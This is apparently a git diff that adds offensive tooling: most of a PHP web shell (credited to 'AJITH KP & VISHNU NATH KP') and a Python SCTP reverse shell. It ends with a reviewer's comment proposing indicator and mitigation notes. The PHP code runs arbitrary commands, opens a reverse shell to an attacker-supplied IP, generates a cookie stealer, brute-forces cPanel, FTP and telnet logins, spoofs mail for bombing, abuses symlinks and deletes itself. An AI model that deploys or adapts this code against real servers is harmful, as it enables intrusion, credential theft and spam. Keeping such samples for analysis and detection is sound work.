function_exists('feof')) + { + $fd = fopen($r_file, "rb"); + if (!$fd) + { + alert("Permission Denied"); + } + else + { + while(!feof($fd)) + { + $rr_content=wordwrap(htmlspecialchars(fgets($fd))); + } + } + fclose($fd); + } + echo "

Edit File : ". basename($_GET['read']) ."


".$rr_content."
"; +} +function copy_file_ui() +{ + echo "

Copy File




Copy : To : Name :






"; +} +function copy_file_bg() +{ + global $sep; + if(function_exists(copy)) + { + if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name'])) + { + alert("Succeded"); + } + else + { + alert("Access Denied"); + } + } +} +function ch_perm_bg() +{ + if(isset($_GET['p_filex']) && isset($_GET['new_perm'])) + { + if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE) + { + alert("Succeded. Permission Changed!!!"); + } + else + { + alert("Access Denied for This Operation"); + } + } +} +function ch_perm_ui() +{ + $p_file=$_GET['perm']; + echo "

New Permission :

"; + ch_perm_bg(); +} +function mk_file_ui() +{ + chdir($_GET['path']); + echo "


+ + New File Name :



+

+
"; +} +function mk_file_bg() +{ + chdir($_GET['path']); + $c_path=$_GET['path']; + $c_file=$_GET['new_f_name']; + $c_file_contents=$_GET['n_file_content']; + $handle=fopen($c_file, "w"); + if(!$handle) + { + alert("Permission Denied"); + } + else + { + fwrite($handle,$c_file_contents); + alert("Your changes were Successfully Saved!"); + } + fclose($handle); +} +function create_dir() +{ + chdir($_GET['path']); + $new_dir=$_GET['new_dir']; + if(is_writable($_GET['path'])) + { + mkdir($new_dir); + alert("Direcory Created Successfully"); + exit; + } + else + { + alert("Access Denied for this Operation"); + exit; + } +} +function cmd($cmd) +{ + chdir($_GET['path']); + $res=""; + if($_GET['cmdexe']) + { + $cmd=$_GET['cmdexe']; + } + if(function_exists('shell_exec')) + { + $res=shell_exec($cmd); + } + else if(function_exists('exec')) + { + exec($cmd,$res); + $res=join("\n",$res); + } + else if(function_exists('system')) + { + ob_start(); + system($cmd); + $res = ob_get_contents(); + ob_end_clean(); + } + elseif(function_exists('passthru')) + { + ob_start(); + passthru($cmd); + $res=ob_get_contents(); + ob_end_clean(); + } + else if(function_exists('proc_open')) + { + $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); + $handle = proc_open($cmd ,$descriptorspec , $pipes); + if(is_resource($handle)) + { + if(function_exists('fread') && function_exists('feof')) + { + while(!feof($pipes[1])) + { + $res .= fread($pipes[1], 512); + } + } + else if(function_exists('fgets') && function_exists('feof')) + { + while(!feof($pipes[1])) + { + $res .= fgets($pipes[1],512); + } + } + } + pclose($handle); + } + + else if(function_exists('popen')) + { + $handle = popen($cmd , "r"); + if(is_resource($handle)) + { + if(function_exists('fread') && function_exists('feof')) + { + while(!feof($handle)) + { + $res .= fread($handle, 512); + } + } + else if(function_exists('fgets') && function_exists('feof')) + { + while(!feof($handle)) + { + $res .= 
fgets($handle,512); + } + } + } + pclose($handle); + } + + $res=wordwrap(htmlspecialchars($res)); + if($_GET['cmdexe']) + { + echo "

r00t@TOF:~#


".$res."
"; + } + return $res; +} +function upload_file() +{ + chdir($_POST['path']); + if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name'])) + { + alert("Uploaded File Successfully"); + } + else + { + alert("Access Denied!!!"); + } +} + +function reverse_conn_ui() +{ + global $your_ip; + echo "
+

Reverse Shell


+

+ + + + +
Your IP : + PORT : +
PHP Reverse Shell: nc -l -p port
"; +} +function reverse_conn_bg() +{ + global $os; + $option=$_REQUEST['rev_option']; + $ip=$_GET['my_ip']; + $port=$_GET['my_port']; + if($option=="PHP Reverse Shell") + { + echo "

RESULT



"; + function printit ($string) + { + if (!$daemon) + { + print "$string\n"; + } + } + $chunk_size = 1400; + $write_a = null; + $error_a = null; + $shell = 'uname -a; w; id; /bin/sh -i'; + $daemon = 0; + $debug = 0; + if (function_exists('pcntl_fork')) + { + $pid = pcntl_fork(); + if ($pid == -1) + { + printit("ERROR: Can't fork"); + exit(1); + } + if ($pid) + { + exit(0); + } + if (posix_setsid() == -1) + { + printit("Error: Can't setsid()"); + exit(1); + } + $daemon = 1; + } + else + { + printit("WARNING: Failed to daemonise. This is quite common and not fatal."); + } + chdir("/"); + umask(0); + $sock = fsockopen($ip, $port, $errno, $errstr, 30); + if (!$sock) + { + printit("$errstr ($errno)"); + exit(1); + } + $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); + $process = proc_open($shell, $descriptorspec, $pipes); + if (!is_resource($process)) + { + printit("ERROR: Can't spawn shell"); + exit(1); + } + stream_set_blocking($pipes[0], 0); + stream_set_blocking($pipes[1], 0); + stream_set_blocking($pipes[2], 0); + stream_set_blocking($sock, 0); + printit("Successfully opened reverse shell to $ip:$port "); + while (1) + { + if (feof($sock)) + { + printit("ERROR: Shell connection terminated"); + break; + } + if (feof($pipes[1])) + { + printit("ERROR: Shell process terminated"); + break; + } + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + if (in_array($sock, $read_a)) + { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + if (in_array($pipes[1], $read_a)) + { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + if (in_array($pipes[2], $read_a)) + { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) 
printit("STDERR: $input"); + fwrite($sock, $input); + } + } + fclose($sock); + fclose($pipes[0]); + fclose($pipes[1]); + fclose($pipes[2]); + proc_close($process); + echo "




"; + } +} + +function cookie_jack() +{ + global $cookie_highjacker; + echo "

NOTICE


"; + if(function_exists('fopen') && function_exists('fwrite')) + { + $cook=gzinflate(base64_decode($cookie_highjacker)); + $han_le=fopen("jith_cookie.php", "w+"); + if($han_le) + { + fwrite($han_le, $cook); + echo "Yes... Cookie highjacker is generated.
Name : jith_cookie.php.
Rename it as 404.php or what you like and highjack cookie of your target.
It is useable in XSS
It will make a file configuration.txt in this direcory and save the cookie value in it. :p cheers...




"; + } + else + { + echo "Sorry... Generate COOKIE HIGHJACKER failed




"; + } + } +} + + + +function safe_mode_fuck() +{ + global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php; + $path = chdir($_GET['path']); + chdir($_GET['path']); + switch($_GET['safe_mode']) + { + case "s_php_ini": + $s_file=$s_php_ini; + $s_name="php.ini"; + break; + case "s_htaccess": + $s_name=".htaccess"; + $s_file=$s_htaccess; + break; + case "s_htaccess_pl": + $s_name=".htaccess"; + $s_file=$s_htaccess_pl; + break; + case "s_ini_php": + $s_name="ini.php"; + $s_file=$ini_php; + + } + if(function_exists('fopen')&& function_exists('fwrite')) + { + $s_handle=fopen("$s_name", "a+"); + if($s_handle) + { + fwrite($s_handle, $s_file); + alert("Operation Succeed!!!"); + } + else + { + alert("Access Denied!!!"); + } + fclose($s_handle); + } +} +function safe_mode_fuck_ui() +{ + global $path; + $path=getcwd(); + echo ""; +} +function AccessDenied() +{ + global $path, $forbid_dir; + $path=$_GET['path']; + chdir($path); + if(function_exists('fopen') && function_exists('fwrite')) + { + $forbid=fopen(".htaccess", "wb"); + if($forbid) + { + fwrite($forbid, $forbid_dir); + alert("Opreation Succeeded"); + } + else + { + alert("Access Denied"); + } + fclose($forbid); + } +} + + + +function sym_link() +{ + cmd('rm -rf AKP'); + mkdir('AKP', 0777); + $usrd = array(); + $akps = @implode(@file("/etc/named.conf")); + if(!$file) + { + echo("

Not Found


Sorry, bind file ( /etc/named.conf ) Not Found




"); + } + else + { + $htaccess=@fopen('AKP/.htaccess', 'w'); + fwrite($htaccess,$sym_htaccess); + $php_ini_x=fopen('AKP/php.ini', 'w'); + fwrite($php_ini_x, $sym_php_ini); + symlink("/", "AKP/root"); + echo ""; + foreach($akps as $akp) + { + if(eregi("zone", $akp)) + { + preg_match_all('#zone "(.*)" #', $akp, $akpzz); + flush(); + if(strlen(trim($akpzz[1][0]))>2) + { + $user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0])); + echo "
DomainsUsersExploit
".$akpzz[1][0]."".$user['name']."SymLink
"; + flush(); + } + } + } + } +} + +function php_ende_ui() +{ + echo "

PHP ENCODE/DECODE


+ +
+ Method : TYPE :





"; +} +function php_ende_bg() +{ + $meth_d=$_POST['typed']; + $typ_d=$_POST['typenc']; + $c_ntent=$_POST['php_content']; + $c_ntent=$c_ntent; + switch($meth_d) + { + case "Encode": + switch($typ_d) + { + case "GZINFLATE": + $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),''),9)); + $res_t=""; + break; + case "GZUNCOMPRESS": + $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),''),9)); + $res_t=""; + break; + case "STR_ROT13": + $res_t=trim(stripslashes($c_ntent.' '),''); + $res_t=base64_encode(str_rot13($res_t)); + $res_t=""; + break; + } + break; + case "Decode": + switch($typ_d) + { + case "GZINFLATE": + $res_t=gzinflate(base64_decode($c_ntent)); + break; + case "GZUNCOMPRESS": + $res_t=gzuncompress(base64_decode($c_ntent)); + break; + case "STR_ROT13": + $res_t=str_rot13(base64_decode($c_ntent)); + break; + } + break; + } + echo "

INDRAJITH SHELL


"; +} + +function massmailer_ui() +{ + echo "

MASS MAILER & MAIL BOMBER


+
Mass Mail
FROM :
TO :
Subject :
Mail Bomber
TO :
Subject :
No. of times
"; +} + +function massmailer_bg() +{ + $from=$_POST['from']; + $to=$_POST['to_mail']; + $subject=$_POST['subject_mail']; + $message=$_POST['mail_content']; + if(function_exists('mail')) + { + if(mail($to,$subject,$message,"From:$from")) + { + echo "

MAIL BOMBING




Successfully Mails Send... :p




"; + } + else + { + echo "

MAIL BOMBING




Sorry, failed to Mails Sending... :(




"; + } + } + else + { + echo "

MAIL BOMBING




Sorry, failed to Mails Sending... :(




"; + } +} + +function mailbomb_bg() +{ + $rand=rand(0, 9999999); + $to=$_POST['bomb_to']; + $from="president_$rand@whitewhitehouse.gov"; + $subject=$_POST['bomb_subject']." ID ".$rand; + $times=$_POST['bomb_no']; + $content=$_POST['bmail_content']; + if($times=='') + { + $times=1000; + } + while($times--) + { + if(function_exists('mail')) + { + if(mail($to,$subject,$message,"From:$from")) + { + echo "

MAIL BOMBING




Successfully Mails Bombed... :p




"; + } + else + { + echo "

MAIL BOMBING




Sorry, failed to Mails Bombing... :(




"; + } + } + else + { + echo "

MAIL BOMBING




Sorry, failed to Mails Bombing... :(




"; + } + } +} + + +/* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/ +/*------------------------ Credit Goes to Them ---------------------------------*/ +function cpanel_check($host,$user,$pass,$timeout) +{ + set_time_limit(0); + global $cpanel_port; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); + curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); + curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); + curl_setopt($ch, CURLOPT_FAILONERROR, 1); + $data = curl_exec($ch); + if ( curl_errno($ch) == 28 ) + { + print "Error : Connection Timeout. Please Check The Target Hostname ."; + exit; + } + else if (curl_errno($ch) == 0 ) + { + print "[~] + Cracking Success With Username "$user\" and Password \"$pass\"

"; + } + curl_close($ch); +} + +function cpanel_crack() +{ + set_time_limit(0); + global $os; + echo "
"; + $cpanel_port="2082"; + $connect_timeout=5; + if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype'])) + { + ?> +
+
+ + + + + + + + + + + + + + + + + + + +
Target :
User namesPassword
Guess options :
Timeout delay :
+
+
+ Please Enter The Users or Password List
"; + else + { + $userlist=explode("\n",$_POST['username']); + $passlist=explode("\n",$_POST['password']); + + if($_POST['cracktype'] == "ftp") + { + foreach ($userlist as $user) + { + $pureuser = trim($user); + foreach ($passlist as $password ) + { + $purepass = trim($password); + ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout); + } + } + } + if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet") + { + if($cracktype == "telnet") + { + $cpanel_port="23"; + } + else + $cpanel_port="2082"; + foreach ($userlist as $user) + { + $pureuser = trim($user); + echo " [ - ] + Processing user $pureuser ...

"; + foreach ($passlist as $password ) + { + $purepass = trim($password); + cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout); + } + } + } + } + } + + echo "
"; +} + +function get_users() +{ + $userz = array(); + $user = file("/etc/passwd"); + foreach($user as $userx=>$usersz) + { + $userct = explode(":",$usersz); + array_push($userz,$userct[0]); + } + if(!$user) + { + if($opd = opendir("/home/")) + { + while(($file = readdir($opd))!== false) + { + array_push($userz,$file); + } + } + closedir($opd); + } + $userz=implode(', ',$userz); + return $userz; +} + +function exploit_details() +{ + global $os; + echo "
+

Exploit Server Details




+ + + + "; + if(function_exists('apache_get_modules')) + { + echo ""; + } + if($os=='win') + { + echo " + + "; + } + if($os=='nix') + { + echo " + + + + + + + + + "; + $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $uze=array(); + foreach($useful as $uzeful) + { + if(cmd("which $uzeful")) + { + $uze[]=$uzeful; + } + } + echo ""; + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + $uze=array(); + foreach($downloaders as $downloader) + { + if(cmd("which $downloader")) + { + $uze[]=$downloader; + } + } + echo ""; + echo " + "; + } + echo "
+ OS: ".php_uname(s)."
PHP Version : ".phpversion().".
Kernel Release : ".php_uname(r)."
Kernel Version : ".php_uname(v)."
Machine : ".php_uname(m)." +
Server Software : ".$_SERVER['SERVER_SOFTWARE']."
Loaded Apache modules :

"; + echo implode(', ', apache_get_modules()); + echo "
Account Setting :
".cmd('net accounts')."
User Accounts :
".cmd('net user')."
Distro :
".cmd('cat /etc/*-release')."
Distr name :
".cmd('cat /etc/issue.net')."
GCC :
".cmd('whereis gcc')."
PERL :
".cmd('whereis perl')."
PYTHON :
".cmd('whereis python')."
JAVA :
".cmd('whereis java')."
APACHE :
".cmd('whereis apache')."
CPU :

".cmd('cat /proc/cpuinfo')."
RAM :
".cmd('free -m')."
User Limits :

".cmd('ulimit -a')."
Useful :
";
+              echo implode(', ',$uze);
+              echo "
Downloaders :
";
+              echo implode(', ',$uze);
+              echo "
Users :
".wordwrap(get_users()).">
Hosts :
".cmd('cat /etc/hosts')."





"; +} + +function remote_file_check_ui() +{ + echo "

Remote File Check




+ + +
URL :
Input File's Names in TextArea








"; +} + +function remote_file_check_bg() +{ + set_time_limit(0); + $rtr=array(); + echo "

Scanner Report




"; + $webz=$_POST['rem_web']; + $uri_in=$_POST['tryzzz']; + $r_xuri = trim($uri_in); + $r_xuri=explode("\n", $r_xuri); + foreach($r_xuri as $rty) + { + $urlzzx=$webz.$rty; + if(function_exists('curl_init')) + { + echo ""; + $ch = curl_init($urlzzx); + curl_setopt($ch, CURLOPT_NOBODY, true); + curl_exec($ch); + $status_code=curl_getinfo($ch, CURLINFO_HTTP_CODE); + curl_close($ch); + if($status_code==200) + { + echo ""; + } + else + { + echo ""; + } + } + else + { + echo "cURL Not Found"; + } + } + echo "
Checking : $urlzzx Found....
Not Found...





"; +} + +function remote_download_ui() +{ + echo "

Remote File Download




+ +
URL





"; +} + +function remote_download_bg() +{ + chdir($_GET['path']); + global $os; + $opt=$_GET['type_r_down']; + $rt_ffile=$_GET['rurlfile']; + $name=basename($rt_ffile); + echo "
"; + switch($opt) + { + case "WGET": + if($os!='win') + { + cmd("wget $rt_ffile"); + alert("Downloaded Successfully..."); + } + else + { + alert("Its Windows OS... WGET is not available"); + } + break; + case "cURL": + if(function_exists('curl_init')) + { + $ch = curl_init($rt_ffile); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); + $data = curl_exec($ch); + curl_close($ch); + file_put_contents($name, $data); + alert("Download succeeded"); + } + else + { + alert("cURL Not Available"); + } + break; + } + echo "
"; +} + +function hex_encode_ui() +{ + if(isset($_REQUEST['hexinp']) && isset($_REQUEST['tyxxx'])) + { + $tyx=$_POST['tyxxx']; + $rezultzz=$_POST['hexinp']; + switch($tyx) + { + case "Encode": + $rzul=PREG_REPLACE("'(.)'e","dechex(ord('\\1'))",$rezultzz); + echo "

HEXADECIMAL ENCODER




+ +

+ Input :




"; + break; + case "Decode": + $rzul=PREG_REPLACE("'([\S,\d]{2})'e","chr(hexdec('\\1'))",$rezultzz); + echo "

HEXADECIMAL ENCODER




+ +

+ Input :




"; + break; + } + } + else + { + echo "

HEXADECIMAL ENCODER




+ +

+ Input :




"; + } +} + +function about_us() +{ + echo "

About us




+

AJITH KP & VISHNU NATH KP

+ We are brothersz & dedicated this to my
+ \"Father [Devadasan KP] and Mother[Prakasini AP]\"
My classmates and teachers.
and my buddy SREEJU +
And all friends, teachers in AMSTECK ATRS AND SCIENCE COLLEGE [BCA & BSc] +
Amteck : Dheeraj, Jhelai, Ashwin, Arjun,etc...
+ ToF : Coded32 [who forced me to concentrate in Programming], Null|Void, Al3x,John,etc.
+ Indishell : d@rkwolf,ash3ll & Sen[Who teach me the first lessons]









"; +} + +function killme() +{ + global $self; + echo "

Good Bye Dear


Dear, Good by... :( Hope You Like me...





";
+ $me=basename($self);
+ unlink($me);
+}
+
+
+//////////////////////////////// Frond End Calls ///////////////////////////////
+
+if(isset($_POST['e_file']) && isset($_POST['e_content_n']))
+{
+ edit_file_bg();
+}
+
+else if(isset($_REQUEST['killme']))
+{
+ killme();
+}
+
+else if(isset($_REQUEST['hexenc']))
+{
+ hex_encode_ui();
+}
+
+else if(isset($_REQUEST['about_us']))
+{
+ about_us();
+}
+
+else if(isset($_REQUEST['remotefiledown']))
+{
+ remote_download_ui();
+}
+
+else if(isset($_GET['type_r_down']) && isset($_GET['rurlfile']) && isset($_GET['path']))
+{
+ remote_download_bg();
+}
+
+else if(isset($_REQUEST['cpanel_crack']))
+{
+ cpanel_crack();
+}
+
+else if(isset($_REQUEST['rem_web']) && isset($_REQUEST['tryzzz']))
+{
+ remote_file_check_bg();
+}
+
+else if(isset($_REQUEST['typed']) && isset($_REQUEST['typenc']) && isset($_REQUEST['php_content']))
+{
+ php_ende_bg();
+}
+
+else if(isset($_REQUEST['remote_server_scan']))
+{
+ remote_file_check_ui();
+}
+
+else if(isset($_REQUEST['server_exploit_details']))
+{
+ exploit_details();
+}
+
+else if(isset($_REQUEST['from']) && isset($_REQUEST['to_mail']) && isset($_REQUEST['subject_mail']) && isset($_REQUEST['mail_content']))
+{
+ massmailer_bg();
+}
+
+else if(isset($_REQUEST['mysqlman']))
+{
+ mysqlman();
+}
+
+else if(isset($_REQUEST['bomb_to']) && isset($_REQUEST['bomb_subject']) && isset($_REQUEST['bmail_content']))
+{
+ mailbomb_bg();
+}
+
+else if(isset($_REQUEST['cookiejack']))
+{
+ cookie_jack();
+}
+
+else if(isset($_REQUEST['massmailer']))
+{
+ massmailer_ui();
+}
+
+else if(isset($_REQUEST['rename']))
+{
+ chdir($_GET['path']);
+ rename_ui();
+}
+
+else if(isset($_GET['old_name']) && isset($_GET['new_name']))
+{
+ chdir($_GET['path']);
+
+ rename_bg();
+
+}
+else if(isset($_REQUEST['encodefile']))
+{
+ php_ende_ui();
+}
+else if(isset($_REQUEST['edit']))
+{
+ edit_file();
+}
+else if(isset($_REQUEST['down']))
+{
+ chdir($_GET['path']);
+ download();
+
+}
+else if(isset($_REQUEST['read']))
+{
+
chdir($_GET['path']);
+ code_viewer();
+
+}
+else if(isset($_REQUEST['perm']))
+{
+ chdir($_GET['path']);
+ ch_perm_ui();
+}
+else if(isset($_GET['path']) && isset($_GET['p_filex']) && isset($_GET['new_perm']))
+{
+ chdir($_GET['path']);
+ ch_perm_bg();
+}
+
+else if(isset($_REQUEST['del_fil']))
+{
+ chdir($_GET['path']);
+ delete_file();
+ exit;
+}
+else if(isset($_REQUEST['phpinfo']))
+{
+ chdir($_GET['path']);
+ ob_clean();
+ echo phpinfo();
+ exit;
+}
+else if(isset($_REQUEST['del_dir']))
+{
+ chdir($_GET['path']);
+ $d_dir=$_GET['del_dir'];
+ deldirs($d_dir);
+}
+else if(isset($_GET['path']) && isset($_GET['new_file']))
+{
+ chdir($_GET['path']);
+ mk_file_ui();
+}
+else if(isset($_GET['path']) && isset($_GET['new_f_name']) && isset($_GET['n_file_content']))
+{
+ mk_file_bg();
+}
+else if(isset($_GET['path']) && isset($_GET['new_dir']))
+{
+ chdir($_GET['path']);
+ create_dir();
+}
+else if(isset($_GET['path']) && isset($_GET['cmdexe']))
+{
+ chdir($_GET['path']);
+ cmd();
+}
+else if(isset($_POST['upload_f']) && isset($_POST['path']))
+{
+ upload_file();
+}
+else if(isset($_REQUEST['rs']))
+{
+ reverse_conn_ui();
+}
+else if(isset($_GET['rev_option']) && isset($_GET['my_ip']) && isset($_GET['my_port']))
+{
+ reverse_conn_bg();
+}
+else if(isset($_REQUEST['safe_mod']) && isset($_REQUEST['path']))
+{
+ chdir($_GET['path']);
+ safe_mode_fuck_ui();
+}
+else if(isset($_GET['path']) && isset($_GET['safe_mode']))
+{
+ safe_mode_fuck();
+}
+else if(isset($_GET['path']) && isset($_REQUEST['forbd_dir']))
+{
+ AccessDenied();
+}
+
+
+else if(isset($_REQUEST['symlink']))
+{
+ sym_link();
+}
+
+else if(isset($_GET['dbz']) && isset($_GET['db_user']) && isset($_GET['db_password']) && isset($_GET['db_port']))
+{
+ SQL_Shell_bg();
+}
+else if(isset($_GET['path']) && isset($_GET['copy']))
+{
+ copy_file_ui();
+}
+else if(isset($_GET['c_file']) && isset($_GET['c_target']) &&isset($_GET['cn_name']))
+{
+ copy_file_bg();
+}
+else
+{
+ filemanager_bg();
+}
+
+////////////////////////////// End Frond End Calls //////////////////////////////
+
+
+echo "

+
PWD :
+ + + + + + + + +
New File :
+
: New Dir
+
CMD :
+
: Upload File
+

© AJITH KP & VISHNU NATH KP ©
® TOF [2012] ®

"
+?>
diff --git a/php/reverseshell-poc.txt b/php/reverseshell-poc.txt
new file mode 100644
index 0000000..4f8e40b
--- /dev/null
+++ b/php/reverseshell-poc.txt
@@ -0,0 +1,102 @@
+
+
diff --git a/py/sctp_reverse.py.txt b/py/sctp_reverse.py.txt
new file mode 100644
index 0000000..c8b6adb
--- /dev/null
+++ b/py/sctp_reverse.py.txt
@@ -0,0 +1,36 @@
+#!/usr/bin/python
+# SCTP Reverse Shell (TCP mode)
+# Requires pysctp and sctp to be working
+# on the victim box.
+# My perfect saturday... Involves #
+# infodox - Insecurety Research 2013
+# insecurety.net | @info_dox
+
+# I probably imported too much things. Who cares.
+import socket
+import _sctp
+import sctp
+from sctp import *
+import os
+import subprocess
+
+host = '127.0.0.1' # CHANGEME
+port = 1337 # CHANGEME
+
+socket.setdefaulttimeout(60)
+s = None
+try:
+ s = sctpsocket_tcp(socket.AF_INET)
+ s.connect((host,port))
+ s.send('g0tsh3ll!\n')
+ save = [ os.dup(i) for i in range(0,3) ]
+ os.dup2(s.fileno(),0)
+ os.dup2(s.fileno(),1)
+ os.dup2(s.fileno(),2)
+ shell = subprocess.call(["/bin/sh","-i"])
+ [ os.dup2(save[i],i) for i in range(0,3)]
+ [ os.close(save[i]) for i in range(0,3)]
+ os.close(s.fileno())
+except Exception:
+ print "Connection Failed! Is there even a listener?"
+ pass
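Review bot: The header comments of `sctp_reverse.py.txt` name the tool but record none of the behaviour an analyst would match on, which is the part worth documenting in a sample kept for reference. From the body, the observable sequence is an outbound SCTP association (IP protocol 132, opened through `sctpsocket_tcp`), `os.dup2` of the socket onto descriptors 0–2, and a child `/bin/sh -i`; I would add `# Indicators: outbound SCTP (IP proto 132); socket dup2'd onto fds 0-2; python parent of /bin/sh -i` under the title line. Egress rules and flow logs that only enumerate TCP and UDP would presumably not account for this traffic, so a second comment such as `# Mitigation: default-deny egress for non-TCP/UDP protocols; unload the sctp kernel module where unused` is worth adding. The `print` statement also makes the file Python 2 only, which the header could state.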